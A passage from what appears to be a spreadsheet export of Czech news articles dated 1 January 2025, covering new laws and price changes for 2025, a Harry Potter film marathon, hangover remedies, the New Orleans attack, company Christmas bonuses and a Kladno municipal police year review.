v aplikaci. I když elektronická zelená karta zcela nahrazuje papírovou podobu v rámci EU, při cestách do zemí mimo Evropskou unii se doporučuje mít tištěnou verzi stále po ruce . V autoškolách budou přísnější testy, dále je také ve hře například zvýšení rychlosti na některých úsecích dálnic. Řidičák nově získají i lidé s autismem a větší vadou sluchu. Z ročního zákazu na šest měsíců se zkrátí doba, po kterou nesmí lidé po ukončení léčby závislosti řídit automobil. V lednu začnou rovněž platit přísnější emisní limity a automobilkám hrozí za produkci vozů s nadměrnými emisemi vysoké pokuty. Od nového roku vstupují v platnost nové sazby za elektronické dálniční známky. Ceník najdete ZDE . Příspěvky na pořízení auta Od 1. ledna bude zrušena vratka DPH při nákupu motorového vozidla pro osoby se zdravotním postižením a bude nahrazena zvýšením příspěvku na nákup motorového vozidla o 85 tisíc Kč, což je průměrná částka, která byla na DPH vyplácena. Měrná cena u potravin Počínaje lednem 2025 budou všechny balené potravinářské a nepotravinářské výrobky označeny kromě prodejní ceny také měrnou cenou (měrná cena je cena vztahující se k určité měrné jednotce, například kilogram, litr, metr, kus a používá se k usnadnění porovnávání cen různých výrobků nebo služeb, které mohou být baleny nebo nabízeny v různých množstvích, pozn. red.) . Spotřebitel tak bude mít možnost snadného a spolehlivého srovnání cen. Nebalené výrobky, které jsou váženy nebo měřeny v přítomnosti nakupujícího, a to buď v samoobsluhách, nebo v prodeji s obsluhou, musí být označeny pouze měrnou cenou. Konkrétní seznam baleného nepotravinářského zboží bude zveřejněn ve vyhlášce MF . Výluky MHD a dražší jízdné Největší změny v dopravě čekají zřejmě hlavní město. V roce 2025 bude v Praze několik dlouhodobých výluk městské hromadné dopravy, zejména kvůli rozsáhlým stavebním pracím a rekonstrukcím. Mezi klíčové patří pokračování výstavby trasy metra D, což si vyžádá výluku stanice Pankrác na trase C. Ta začne v lednu a bude trvat přibližně jeden rok. Během této doby bude stanice uzavřena, vlaky budou stanicí projíždět bez zastavení. Náhradní doprava bude zajištěna pomocí autobusů a tramvají, přičemž se plánuje prodloužení tramvajové trati na Pankrác . Roční uzavírku dopravní podnik využije i k obnově staré stanice. Modernizace čeká například toalety nebo osvětlení a vznikne také nové napojení na tramvaj. Uzavřena bude od ledna také stanice metra B Českomoravská , důvodem je celková rekonstrukce. Uzavírka potrvá přibližně 11 měsíců. Tramvajové výluky : V roce 2025 bude navazovat kompletní rekonstrukce tramvajové tratě v ulici U Výstaviště , která začne po předchozích pracích v roce 2024. Tato rekonstrukce se zaměří na úseky v blízkosti Strossmayerova náměstí a Výstaviště. Další omezení jsou plánována v souvislosti s výstavbou stanic Olbrachtova a Krč na trase metra D, což povede k uzavírkám ulic jako Na Strži a Vídeňská. Dále budou omezení také v oblasti Krčského údolí a Jižní spojky . Městská doprava ve Vlašimi bude od nového roku integrována do systému PID. Zdejší jediná autobusová linka MHD bude mít nově číslo 841 a kromě místního tarifu MHD bude i na této lince platit běžný tarif PID. Naopak na linkách na území Vlašimi bude nově možné jezdit za tarif místní MHD. V praxi to znamená, že jednorázová cesta na území Vlašimi vyjde na 10 Kč. A naopak, pokud přijedete autobusem nebo vlakem PID, přestup na MHD budete mít zdarma (pokud se vejdete do časové platnosti jízdenky). V Českých Budějovicích lidé za jízdenku s platností 60 minut zaplatí místo původních 20 už 30 korun. Zdraží i dětská jízdenka z 10 na 15 korun. Pokud si lidé koupí jízdenku na celý den, místo 75 je bude stát 115 korun. Obecně tak jednorázové jízdenky zdraží zhruba o polovinu. V Plzni se od roku 2025 zvýší ceny předplatných jízdenek. Základní 30denní předplatné bude nově stát 554 korun (dosud 546 korun), předplatné na 183 dní 2 694 korun (dosud 2 646 korun) a předplatné na 365 dní 4 656 korun (dosud 4 574 korun). Za zlevněné 30denní předplatné zaplatí lidé od ledna 277 korun (dosud 273 korun), za předplatné na 183 dní 1 347 korun (dosud 1 323 korun) a za předplatné na 365 dní 2 328 korun (dosud 2 287). Ceny za jednotlivé jízdné se v novém roce nezmění. Zdražení cigaret a alkoholu Od 1. ledna 2025 opět stoupnou ceny alkoholu a tabáku. Má se totiž znovu zvýšit spotřební daň, u alkoholu o 10 a u tabáku o 5 % . Zvyšování je součástí konsolidačního balíčku, který v roce 2023 připravila vláda. U lihu se od roku 2025 zvedne spotřební daň o 10 %, v roce 2026 o 5. Letos to bylo také o 10 %. Naopak spotřební daň na pivo a také na šumivé víno zůstává stejná. Stejně tak je dosud nulová daň na tiché víno . A malé pivovary při splnění několika podmínek dosáhnou na sníženou sazbu spotřební daně. Zemědělci zase můžou od roku 2025 dvakrát ročně žádat o vratku části spotřební daně ze zelené nafty. Od ledna rovněž zákon přichází s novou kategorií návykových látek – takzvané psychomodulační. Zmizí přitom kanabinoidy ze seznamu zakázaných látek. Jejich prodej, užívání nebo držení budou přísně regulované, ne ale nezákonné. Prodej kanabinoidů bude zakázán jen u mladších 18 let a zboží nesmí evokovat hračky ani cukrovinky. Prodej je zakázán i prostřednictvím automatů, e-shopy musí dodržovat jistá omezení. Stejnopohlavní páry Od ledna začíná platit novela občanského zákoníku, která má zajistit vyšší právní jistotu a ochranu stejnopohlavních párů. Novela zavádí nový institut partnerství jako svazku dvou lidí stejného pohlaví , který dává na úroveň manželství s tím, že na partnerství a práva a povinnosti partnerů se obdobně vztahují ustanovení o manželství a právech a povinnostech manželů, vdovách a vdovcích. Zároveň zákon umožňuje, aby se osvojitelem dítěte stal také partner, je-li rodičem dítěte druhý z partnerů. Po nabytí účinnosti zákona budou uzavřená registrovaná partnerství nadále existovat, ale již nebudou moci vznikat nová. Méně poboček Celní správy ČR Od nového roku se sníží počet celních úřadů z dosavadních 15 na 6. Zároveň dojde ke změně kompetence Celní správy ČR. Jejími kmenovými působnostmi budou: celnictví, správa daní (zejména spotřebních a energetických), dělená správa (správa placení a vymáhání peněžitých plnění za jiné orgány) a dozor v oblasti hazardních her. Podpůrnými oblastmi pro výkon hlavních kompetencí budou oblasti pátrání (role policejního orgánu) a dohledové činnosti primárně ve vztahu ke zboží. Dohodářům se zvýší limity Počínaje lednem 2025 si pracující na dohodu budou moci vydělat více bez toho, aby z výdělku museli odvádět sociální a zdravotní pojištění. Zaměstnaní na dohodu o provedení práce se dočkají zvýšení limitu pro placení pojistného. Limit již nebude fixní částkou, ale půjde o 25 % průměrné mzdy pro daný rok. Konkrétně pro rok 2025 tak půjde o limit 11 500 korun měsíčně. Doteď byl limit 10 000 korun, jedná se tedy o zvýšení o 1 500 korun měsíčně. Lidem v exekuci zůstane méně peněz Mnoha lidem v exekuci klesnou peníze, které mají na obživu. Nebudou si totiž moci do nezabavitelné částky započítávat svého manžela, manželku nebo registrovaného partnera. Výjimku budou mít pouze dlužníci s důchodem nebo s manžely či manželkami pobírajícími starobní nebo sirotčí penzi či invalidní důchod druhého či třetího stupně. Změnu schválila vláda koncem roku 2024 na návrh ministerstva spravedlnosti . Proti záměru protestovaly některé neziskové organizace i ministerstva. Bojí se toho, že existenční problémy řady dlužníků se ještě více prohloubí. Nová přírodní rezervace Od ledna vzniká v Česku zcela nová národní přírodní rezervace Lanžhotské pralesy na Břeclavsku. Tato p řírodní památka se rozkládá na území Jihomoravského kraje , a to v katastrálních územích Břeclav , Lanžhot a Poštorná . Polsko přebírá kormidlo Rady EU Polsko přebírá 1. ledna 2025 předsednictví Rady EU od Maďarska . Během následujícího půlroku se u našich severních sousedů uskuteční více než 300 oficiálních zasedání a 22 zasedání ministrů zemí EU, do země má dorazit podle odhadů 40 000 hostů včetně předsedů vlád a ministrů. Do polského předsednictví se má zapojit 3 000 úředníků. Polsko plánuje během nejbližších šesti měsíců mimo jiné prosazovat definitivní ukončení závislosti Evropy na ruských energetických zdrojích a posílení transatlantických vztahů s USA i dalšími spojenci mimo EU. Konec chatovací aplikace Populární komunikační aplikace WhatsApp 1. ledna definitivně skončí na řadě starších telefonů. Změna se dotkne hlavně uživatelů starších Androidů a iPhonů. Aplikace přestane fungovat na telefonech s operačním systémem Android 4.4 (KitKat) a starších. Důvodem je, že se stále více zaměřuje na prvky umělé inteligence a rozšířenou ochranu soukromí. Změna se dotkne přibližně 20 modelů telefonů z let 2010 až 2014. Pořad Na vaší straně se přesouvá na úterý Oblíbený publicistický pořad televize Nova Na vaší straně změní od ledna vysílací den. Na r eportáže, návody, ale i varování v pořadu, který bojuje za práva spotřebitele, se diváci mohou těšit už v úterý večer po 22:00, nikoli ve čtvrtek, jak tomu bylo dosud. Od ledna čekají zaměstnance změny. Vyšší limity pro benefity a výdělek na dohodu (12/2024): TN.cz Autor: Eva Vaňáčová Autor person Eva Vaňáčová</t>
  </si>
  <si>
    <t>20250101_368_3693910536_40df9fa1e3576c7aff6d.html</t>
  </si>
  <si>
    <t>40df9fa1e3576c7aff6d</t>
  </si>
  <si>
    <t>Maraton filmů s Harry Potterem v Hodoníně. Tady je termín i ceny vstupenek</t>
  </si>
  <si>
    <t>Maraton filmů s Harry Potterem v Hodoníně . Tady je termín i ceny vstupenek „Připravte si hůlky, protože po Středozemi vyjede přímý spoj Hodonín – Bradavice,“ avizovali organizátoři. Maraton čarodějnického fenoménu se uskuteční v sobotu 8. a 9. února, na rozdíl od předchozí akce s Pánem prstenů je tak rozdělený na dvě poloviny. Cena za každý den, který nabídne vždy čtyři díly, je 540 korun. Filmy budou v originálním znění s titulky. play_fill Hodonínsko O předchozí maraton byl velký zájem, návštěvníci kino sál v Hodoníně vykoupili . Někteří diváci přišli dokonce v kostýmech . Na první den lze koupit vstupenky TADY , na druhý pak ZDE . VIDĚLI JSTE? Krimi zprávy: sražená žena ve Veselí, hazard ve Bzenci , alkohol u tragédie Autor: Lukáš Ivánek Autor Lukáš Ivánek</t>
  </si>
  <si>
    <t>20250101_369_3694664929_42d4efb17b7853f7fa5d.html</t>
  </si>
  <si>
    <t>42d4efb17b7853f7fa5d</t>
  </si>
  <si>
    <t>Jak na kocovinu po silvestru? Domácí vyprošťovák je česnek, pomáhá i zmrzlina Po silvestrovských oslavách se mnozí probouzejí s kocovinou a hledají účinné vyprošťováky. Tradiční české recepty , rady gurmeta Pavla Maurera a historika gastronomie Martina France či tipy od umělé inteligence nabízejí rozmanité způsoby, jak se s nepříjemnými následky pití alkoholu vypořádat. Od česnečky po japonské švestky umeboshi, každý si může najít svůj osvědčený lék. Deník přináší tipy na vyprošťováky.... Celý článek naleznete na: www.denik.cz/... Autor: Lasty Webdesign Autor person Lasty Webdesign</t>
  </si>
  <si>
    <t>20250101_37_3698274189_9bf6fe61b17dc1dfc98d.html</t>
  </si>
  <si>
    <t>9bf6fe61b17dc1dfc98d</t>
  </si>
  <si>
    <t>Chtěl zabít co nejvíc lidí</t>
  </si>
  <si>
    <t>Chtěl zabít co nejvíc lidí Eva HECKO PERKAUSOVÁ, moderátorka: Město New Orleans se stalo terčem teroristického útoku. To jsou slova starostky největšího města amerického státu Louisiana . Do davu lidí slavících příchod Nového roku najelo auto. Petr SUCHOŇ , moderátor: Deset lidí řidič zabil na místě, dalších 35 utrpělo zranění. Muž pak střílel i po policistech, ti ho zastřelili. Vyšetřování přebírá FBI . Prezident Biden je o případu průběžně informován. Nastupující prezident Trump útok spojuje s ilegální migrací. Podle posledních informací CNN měla být v autě útočníka vlajka Islámského státu. Anna KADAVÁ, reportérka: New Orleans , Bourbon street, Francouzská čtvrť. Místo, kam se lidé v největším městě americké Louisiany chodí bavit. A to zvlášť o Silvestru. Ve tři hodiny a patnáct minut ráno najíždí auto do davu lidí. Několik hodin nato předstupuje starostka města před novináři. Latoya CANTRELLOVÁ, starostka New Orleans : New Orleans postihl teroristický útok. Už jsem informovala Bílý dům. Prosím vás o modlitby za ty, kteří přišli o život. Vyhněte se prosím také Bourbon street a okolí. Anna KADAVÁ, reportérka: Policie uzavřela osm bloků v okolí oblíbené Bourbon street. Dlouho nebylo jisté, co se stalo s řidičem bílého pick-upu. Podle policistů není pochyb, že chtěl zabít co nejvíc lidí. Anne KIRKPATRICKOVÁ, policejní komisařka: Muž jel velice rychle a jednal úmyslně. Snažil se přejet co nejvíc lidí. Nejde o případ řízení pod vlivem drog nebo alkoholu . Jde o komplexní situaci. Anna KADAVÁ, reportérka: A také nepřehlednou. Zatímco starostka města tři hodiny po útoku oznámila, že jde o teroristický útok, FBI , která případ převzala to krátce nato popřela. Teď už potvrdila, že případ jako terorismus vyšetřuje. Anne KIRKPATRICKOVÁ, policejní komisařka: Je to obrovská tragédie. Útočník zabil deset lidí. Proto nechceme nikoho vidět v okolí Bourbon street. Jakmile spatříte policejní pásky, respektujte to. Anna KADAVÁ, reportérka: Podle posledních informací amerických médií je řidič vozu po smrti. Zatím není jasné, jaký měl motiv. V autě měla policie najít výbušniny, muž ale zřejmě jednal sám. Další plánované události, jako například očekávaný fotbalový zápas, úřady nezrušily. Další nebezpečí už tak zřejmě městu nehrozí. Anna Kadavá, CNN Prima News.</t>
  </si>
  <si>
    <t>20250101_370_3693888016_251fa24778798ac0de96.html</t>
  </si>
  <si>
    <t>251fa24778798ac0de96</t>
  </si>
  <si>
    <t>Chemička natvrdo o alkoholu: Plíseň byste taky nesnědli. Rizika jsou obrovská</t>
  </si>
  <si>
    <t>Chemička natvrdo o alkoholu : Plíseň byste taky nesnědli. Rizika jsou obrovská Michaela Lišková 1. 1. 2025 5:30 Pití alkoholu lze podle chemičky Olgy Ryparové srovnat s tím, když by lidé jedli plesnivé jídlo. "Plíseň je karcinogen první třídy stejně jako etanol, to je důležité připomínat. Pokud si dá člověk litr vína za týden, jde už o rizikové množství a hrozí při něm až 200 nemocí," upozorňuje popularizátorka vědy. 27:01 Spotlight Generace - Olga Ryparová | Video: Michaela Lišková V posledních letech se v souvislosti s alkoholem skloňuje i anglický termín hangxiety (složenina slov hangover, v překladu kocovina, a anxiety, v překladu úzkost). Úzkostnými stavy při kocovině trpí podle některých studií 18 procent lidí a depresivními stavy dokonce 30 procent lidí. Pusťte si epizodu také jako podcast: "Obecně je to hlavně o množství. To znamená, že čím více alkoholu člověk vypije, tím je to horší. Ty úzkosti jsou spojené i s tím, že velmi často lidé, kteří jimi trpí, na to berou nějaké léky typu xanax a ty špatně reagují s alkoholem a tyto stavy prohlubují," popisuje Ryparová. Pokud už se člověk rozhodne pít, tělo podle chemičky nejlépe zpracovává "průhledný alkohol". "Třeba když pijete vodku, tak tělo zpracovává jen jednu látku, která je pro něj cizí - etanol. Když ale pijete roztoky, které nejsou průhledné, jako je červené víno , whisky, rum, tak ty obsahují obrovské množství dalších látek, které jsou pro naše tělo cizí a tělo je musí nějakým způsobem také zpracovat," doplňuje chemička. Ryparová také vysvětluje, že při pití alkoholu vzniká hormonální nerovnováha. "Je mnoha výzkumy potvrzeno, že existuje obrovský vliv pití alkoholu na vznik rakoviny prsu, což je právě způsobeno hormonální disbalancí. Do toho procesu jsou, jak většina lidí tuší, zapojená játra, kde se odehrává 90 procent té chemie. Když tělo zpracovává etanol, tak se tvoří látky, které jsou pro játra extrémně nebezpečné. Představte si to, jako kdyby do nich při každé reakci vystřelila mikroskopická kulka," dodává. Existuje nějaký osvědčený "lék" na kocovinu? A platí stereotypy, že je lepší se před pitím alkoholu najíst a pít hodně vody? Proč podle Ryparové člověk, který vystudoval chemii, nebude nikdy pít alkohol a jaké vitaminy je dobré po pití alkoholu doplnit? Dozvíte se v rozhovoru v úvodu článku. reklama Autor: Michaela Lišková Autor Michaela Lišková Rubrika transition_slide Spotlight</t>
  </si>
  <si>
    <t>20250101_371_3693890178_5dec750eaeac6dbc4944.html</t>
  </si>
  <si>
    <t>5dec750eaeac6dbc4944</t>
  </si>
  <si>
    <t>Jak na kocovinu po silvestru? Domácí vyprošťovák je česnek, pomáhá i zmrzlina Jedno z nejrychleji vyprchaných novoročních předsevzetí bývá to, které si často říká člověk ráno po bujaré silvestrovské oslavě. Tedy, že už nikdy nebude pít. Pokud však do nového roku vstoupí s kocovinou, může se kromě hadru na hlavu a prášku proti bolesti uchýlit také k různým vyprošťovákům. Žádný z nich sice není zaručený, každý si ale dokáže najít ten svůj. Zdraví S jejich výběrem pomohl Deníku nejen pohled do českých tradic, ale i známý gurmet Pavel Maurer či historik gastronomie Martin Franc, známý jako Docent Jídlo. Svou troškou do mlýna přispěla i umělá inteligence v podání chatbota ChatGPT. Domácí všelék? Česnek Například jeden středočeský recept praví: „Zahřejeme mléko na teplotu, ve které naposledy udržíme prst. Přidáme utřený česnek (jeden stroužek na hrnek mléka), osolíme a přidáme lžičku medu. Vše na mírném ohni propojíme. Poté necháme vychladnout – konzumujeme ideálně následující den. Dva dny starý chléb (nikoli čerstvý!) pokapeme olivovým olejem. Chléb namáčíme v mléce a za stálého vzdychání konzumujeme na lačno.“ Zdraví Gurmet Pavel Maurer pak kromě již tradiční vydatné česnečky nabízí i netradiční pojetí novoročního těžkého vstávání. „Někomu třeba pomůže pivo , ale třeba ve Španělsku se prodává speciální krabice s názvem Ranní polévka s různými vývary,“ řekl gurmet. Návod z Japonska Ve Španělsku mají i další zajímavou tradici, která by podle Maurera mohla pomoct ranní kocovině předejít. A tou je pojídání kuliček hroznového vína . „Než tu odbije půlnoc, dají si Španělé s každou vteřinou před ní právě tyto kuličky, které se prodávají po dvanácti kusech v kornoutu. Zkoušel jsem to, a každou vteřinu sníst jeden hrozen je docela rychlé. Myslím, že když jsou lidé už trochu unavení a snědí tolik hroznového vína , může to být začátek vyprošťováku,“ míní Maurer . Prozradil i návod z Japonska . „Naučila mě to jedna moje japonská kamarádka. Jsou to švestičky umeboshi, tedy nakládané japonské švestky na slano. Ty se dají koupit i v Česku a ráno je to vynikající vyprošťovák,“ doplnil Maurer . Na kocovinu zmrzlina Historik gastronomie Martin Franc podle svých slov nedá při ranní alkoholové nevolnosti dopustit na zmrzlinový pohár s jemnou vanilkovou zmrzlinou. Zdraví Při pohledu do historických análů pak připomněl kuchařku Péťa Vařič aneb Snadné etudy pro hrnec s pokličkou a obě ruce levé z dílny tvůrce Toulek Českou minulostí Petra Hory-Hořejše, která vyšla na konci sedmdesátých let minulého století. „Pamatuji si, že mě už jako dítě zaujal vyprošťovací recept, který doporučoval smíchat silnou černou kávu s citrónovou šťávou,“ uvedl Franc. Doplnil, že s takzvanými vyprošťováky přispěl do české gastronomie i legendární československý kuchař a autor několika kuchařek Vilém Vrabec . „Myslím, že v jednom silvestrovském čísle časopisu Květy radil konzumovat do ovocna laděné koktejly. Vitamín C totiž pomáhá eliminovat nadbytečný alkohol ,“ doplnil Franc. 1. Silný vývar (např. kuřecí nebo hovězí) Vývar obsahuje elektrolyty (sodík, draslík) a kolagen, které hydratují a pomáhají regeneraci. Teplo také zklidní žaludek. Recept: Povařte kuřecí/hovězí maso s kostmi, mrkví, celerem, cibulí, česnekem a solí. Můžete přidat trochu zázvoru pro povzbuzení metabolismu. Sceďte a podávejte s čerstvou petrželkou. 2. Kyselá zelňačka nebo jiné fermentované potraviny Kyselé zelí obsahuje probiotika, která podporují trávení, a vitamín C, který pomáhá tělu zbavit se toxinů. Recept: Na tuku osmahněte cibuli, přidejte nakrájené kysané zelí, brambory, uzené maso a papriku. Zalijte vývarem a vařte. Podávejte s chlebem. 3. Domácí rehydratační nápoj Po alkoholu tělo potřebuje rychle doplnit tekutiny a elektrolyty. Tento nápoj je jednoduchý a účinný. Recept: Smíchejte 500 ml vody, šťávu z jednoho citronu, lžíci medu a špetku soli. Pro extra energii můžete přidat trochu čerstvého zázvoru nebo pomerančového džusu. 4. Banánový smoothie Banány obsahují draslík, který z těla vyplavuje alkohol , mléčné produkty zklidní žaludek. Recept: Rozmixujte banán, sklenici mléka nebo podmáslí a lžíci medu. Autor: Petr Vaňous Autor Petr Vaňous Rubrika transition_slide Česko</t>
  </si>
  <si>
    <t>20250101_372_3693850531_1a4ad589b476dd0cff65.html</t>
  </si>
  <si>
    <t>1a4ad589b476dd0cff65</t>
  </si>
  <si>
    <t>Vánoční odměny v Česku? Dostanete kapra či balicí papír</t>
  </si>
  <si>
    <t>Vánoční odměny v Česku? Dostanete kapra či balicí papír zdroj: azerbaijan_stockers on Freepik Jak vypadaly letošní firemní vánoční dárky? Zatímco zaměstnanci Jablotronu si přišli na neuvěřitelných 300 tisíc korun, jinde se rozdávaly poukazy na kapry, firemní merch nebo i balicí papíry s logem firmy. Podle průzkumu na sociálkních sítích, v němž Bold News oslovily na 300 lidí, na tom byli nejlépe lidé z rodinných firem, kde byly běžné 13. a 14. platy nebo příspěvky na dovolenou. Naopak v některých nadnárodních korporacích se šetřilo tak, že vánoční odměny spíš připomínaly aprílový žert. Strženo z lednové výplaty Mladí Češi obecně nejsou příliš spokojení se svými vánočními odměnami. Zatímco zaměstnanci bezpečnostní firmy Jablotron si k výplatě přilepšili o štědrých 300 tisíc korun, jinde se rozdávaly dárky, které spíš zklamaly. Firemní merch, čokoládové figurky nebo poukaz na kapra. Takové odměny dostávali i lidé z velkých korporací s obraty v desítkách milionů. Výjimkou nejsou ani vánoční prémie, které se strhávají z lednové výplaty. Štědré Vánoce u Jablotronu V polovině prosince obletěla internet zpráva, že zaměstnanci Jablotronu o Vánocích strádat nebudou. Všichni včetně uklízeček si přišli na vánoční odměnu ve výši 300 tisíc korun. Jablotron - frajer Dalibor Dědek dá 300 000 Kč dá odměnu každému z šesti set zaměstnanců. https://t.co/WnaebFwhcQ Majitel Dalibor Dědek se s nimi podělil o desetiprocentní podíl na zisku. „Výsledky firmy jsou slušné a stabilní. Chtěli jsme, aby lidé vnímali, že tím, že pracují pro nás, jsou na tom lépe než jinde,” sdělil Dědek pro magazín Forbes. Poukaz na kapra a sick day Ne každý měl ale o Vánocích důvod k upřímné radosti. V anonymním průzkumu Bold News, kterého se zúčastnilo více než 300 lidí, jsme se ptali, co zaměstnanci dostali pod firemní vánoční stromeček. Odpovědi ukázaly, že štědrost není samozřejmostí. „Pracuji v korporátu spoluvlastněném jedním z nejbohatších Čechů. Nedostali jsme vůbec nic. Tedy vlastně ano. Poukaz na kapra a příslib sick day od příštího roku,“ svěřila se jedna z respondentek. Její kamarádka prý dostala kámen pokreslený lakem na nehty a ozdoby slepené z víček od piva . Ručník nebo snad kapra? O kaprovi se zmínilo téměř 15 % respondentů. „U táty ve firmě dostávali kapra. Cenu kapra jim ale v lednu strhli z výplaty,“ podělil se jeden z dotazovaných. Ve velkých korporacích pak vedou mezi vánočními dárky svíčky, vánočky, vína , čokoládové kolekce nebo firemní merch. Tři pracovníci Seznamu uvedli, že dostali brandovanou deskovou hru Double. Alza zase údajně obdarovala své zaměstnance ručníky. Balicí papír a diplom za přesčasy Někteří zaměstnavatelé se snaží projevit kreativitu a personál obdarovávají například balicími papíry s logem firmy nebo diplomy za přesčasy. „My jsme dostali pozvání na vánoční večeři, ale po dojedení nám bylo řečeno, ať si ji zaplatíme sami,“ popsal zaměstnanec Aero Vodochody . Štědré rodinné firmy Podle průzkumu Bold News na tom byli nejlépe pracovníci z menších rodinných firem, což představovalo přibližně 10 % ze všech respondentů. Jako bonusy zmiňovali například 13. a 14. plat nebo příspěvek na dovolenou. “My jsme v naší firmě dostali 40 tisíc k výplatě, poukaz na dovolenou na 30 tisíc a ještě fajn balíčky," zakončila respondentka pracující ve společnosti s přírodní kosmetikou. Napsal: Aneta Havránková, Bold News Zveřejněno: 1. leden 2025 Autor: Bold News, Aneta Havránková Autoři person Bold News person Aneta Havránková</t>
  </si>
  <si>
    <t>2940</t>
  </si>
  <si>
    <t>3320</t>
  </si>
  <si>
    <t>20250101_373_3693860937_c1bb24335977b7cdf819.html</t>
  </si>
  <si>
    <t>c1bb24335977b7cdf819</t>
  </si>
  <si>
    <t>Městská policie Kladno v roce 2024: Zásahy, pomoc i ocenění veřejnosti</t>
  </si>
  <si>
    <t>Městská policie Kladno v roce 2024: Zásahy, pomoc i ocenění veřejnosti Středa, 1. ledna 2025 05:07 Jako jediní jsme si dovolujeme, vám, našim čtenářům. předložit souhrn mnoha zásahů, strážníků a strážnic MP Kladno v uplynulém roce. Není to zdaleka vše, ani ty nejvýznamnější. Vše neuvedené lze najít na Kladenských listech. Video je redakční sestřih pouze pár z mnoha zásahů, aktivit a pomocí. O kvalitě, profesionalitě i prestiži MP Kladno není třeba diskutovat. Skvěle vedený tým pod taktovkou Michala Strieborného s maximální podporou města Kladno , odvádí perfektní práci a dokazuje í to, že nadstandartní výcvik a školení, pomáhá mimo jiné zachraňovat životy. Michal Stríeborný, velitel MP Kladno. Tvrdý, férový, empatický a oblíbený. Rok 2024 byl pro Městskou policii Kladno opět náročným, ale zároveň úspěšným obdobím. Strážníci museli čelit nejrůznějším situacím, od zásahů u dopravních nehod, přes ochranu majetku až po pomoc v krizových momentech. Jejich práce nezůstala bez povšimnutí, kladenská veřejnost je několikrát ocenila za jejich obětavost a profesionalitu. Zachraňují životy Záchrana životů na prvním místě Jedním z nejvýznamnějších momentů roku byla záchrana mladého muže na Sítenském mostě. Strážník na cestě do práce si všiml dvou mužů, z nichž jeden stál za zábradlím mostu. Díky rychlé reakci a zkušenostem se strážníkovi podařilo společně s kolemjdoucím muže vytáhnout zpět na chodník. Tato událost ukázala nejen důležitost pohotovosti, ale také spolupráce mezi strážníky a občany. Zachovat to nejcennější bylo možné, díky modernímu vybavení vozů a proškoleným strážníkům, pomohli nejednou zachránit životy. Bojují s majiteli autovraků po městě. Dohled nad bezpečností ve městě Městská policie Kladno opakovaně ukázala, že ochrana majetku a veřejného pořádku je její prioritou. V oblasti Habešovna například díky všímavosti obyvatel a spolupráci s policií zadržela pachatele vloupání do rodinných domů. Muž, který měl u sebe nůž a kuličkovou zbraň, byl díky koordinované akci zadržen a předán k dalšímu vyšetřování. Pomáhají a radí také seniorům na mnoha akcích. Boj proti přestupkům a kriminalitě Zde je výpis akcí i informací vybraných redakcí Kladenských listů za celý rok 2024: Prosinec 2024: 26.12.2024 Kladenští strážníci mají ve svých řadách rekordmany v darování krve, Jánského medaili má i zástupkyně ředitele. Zlatou medaili Jana Jánského za 40 odběrů krve obdrželo nedávno v Kladně 17 dobrovolníků. Mezi oceněnými byla také zástupkyně ředitele Městské policie Kladno Jana Dupová. V řadách strážníků, ale zdaleka není sama. Aktuálně daruje krev dvaadvacet mužů a žen, kteří zde pracují 18.12.2024 Kladenští čtvrťáci soutěžili s Empíkem již po patnácté, nejlepší výtvarníky strážníci ocenili. Již 15. ročník výtvarné soutěže Bezpečnost s Empíkem zná své vítěze. Nejlepší malí výtvarníci z kladenských škol se sešli ve středu v budově Městské policie Kladno , aby si od ředitele a preventistů převzali své diplomy, ceny a vítězka i zasloužený pohár 16.12.2024 Strážníci ve sdíleném voze přistihli ženu z Kladna s vysloveným zákazem řízení. Do třetice všeho dobrého i zlého přistihli toto pondělí v nočních hodinách strážníci Městské policie Kladno řidiče sdíleného vozu bez platných dokladů. V tomto případě se jednalo o jedenadvacetiletou ženu z Kladna , která má vysloven zákaz řízení motorových vozidel 13.12.2024 Nevidomému muži, který ztratil klíče, pomáhali domů strážníci. Dezorientovanému nevidomému muži z Kladna , který ztratil klíče od domova, pomáhali před několika dny v nočních hodinách strážníci 11.12.2024 Kamion prý na pěší zónu zavedla navigace, zákazovou značku, ale řidič měl respektovat. Přesto, že povolení ke vjezdu na třídu T. G. Masaryka v Kladně vymezuje dopravní značení, v poslední době se stalo nešvarem, že někteří nepovolaní řidiči si zde popojíždí doslova od obchodu k obchodu bez starostí z toho, že se pohybují po pěší zóně. Osobní auta ale ještě nejsou nic proti tomu, že Městská policie Kladno musela minulý pátek řešit dokonce kamion, jenž sem údajně měla zavést navigace 10.12.2024 Půlroční strakaté kotě nalezené v centru Kladna už má nový domov. Ztracené strakaté kotě, které v sobotu nalezla žena v obytném domě v centru Kladna , už má nový domov. Strážníci, kteří si kočičku převzali, ji prověřili čtečkou, ale čip neměla. Vzhledem k tomu, že až do úterý se o ni nikdo nepřihlásil, úředníci z odboru životního prostředí kladenského magistrátu pro ni našli dočasnou péči a díky informacím v médiích a na sociálních sítích hned následujícího dne i nový domov 9.12.2024 Kladenští strážníci dohlédli na pekelný průvod také ve Vinařicích. Průvod strašidel Krampus zavítal o uplynulém víkendu také do obce Vinařice na Kladensku. Jelikož akce je zde rok od roku populárnější, letos se jí podle odhadu zúčastnilo na šest stovek návštěvníků 6.12.2024 Městská policie „kryje záda“ i nebeským bytostem, jejich návštěvu si Kladeňáci užili Oblíbený Mikulášský průvod včera projel centrem Kladna . Na náměstí Starosty Pavla měly děti možnost svézt se na povozu, které táhlo koňské spřežení kočírované Mikulášem a čertem. Po skončení tohoto programu následovalo vystoupení hudební skupiny Maxim Turbulenc a největší zájem mezi Kladeňáky vyvolal čertovský pochod Krampus. Na vše přitom dohlížela Městská policie Kladno . 3.12.2024 Rozsvěcení Stromu splněných přání v Kladně ohlídalo více než dvacet strážníků. Na bezpečnost při sobotním rozsvěcení Vánočního stromu splněných přání v Kladně jako každoročně dohlížela městská policie. Kladeňáci mohli strážníky zaznamenat ve zvýšeném počtu při hlídce u samotného stromu, řízení provozu v okolí náměstí, dozoru u vánočního vláčku a například také ve Dvořákových sadech u městského divadla, kde je letos nově instalovaná světelná výzdoba 3.12.2024 Kladenští strážníci i policisté řešili únos šestiměsíčního štěněte, Charliee přitom cestoval s terénní pečovatelkou Kuriozní případ se šťastným koncem nedávno řešila Městská policie Kladno . Strážníci pomáhali při pátrání po údajně uneseném retrívrovi Charlieem z Braškova . Jelikož jsou čtyřnozí parťáci nedílnou součástí týmu městské policie, o osud ztraceného psa se strážníci zajímali i po skončení samotného zákroku. Věnují se dětem po všech stránkách, preventivní akce, sportovní akce a mnoho dalšího. Listopad 2024: 4. 11. 2024 – Kladenští strážníci odhalili dalšího muže bez dokladů, který řídil sdílený vůz Městská policie Kladno opět řešila případ, kdy muž bez řidičského oprávnění řídil sdílený vůz a porušoval pravidla silničního provozu. 7. 11. 2024 – 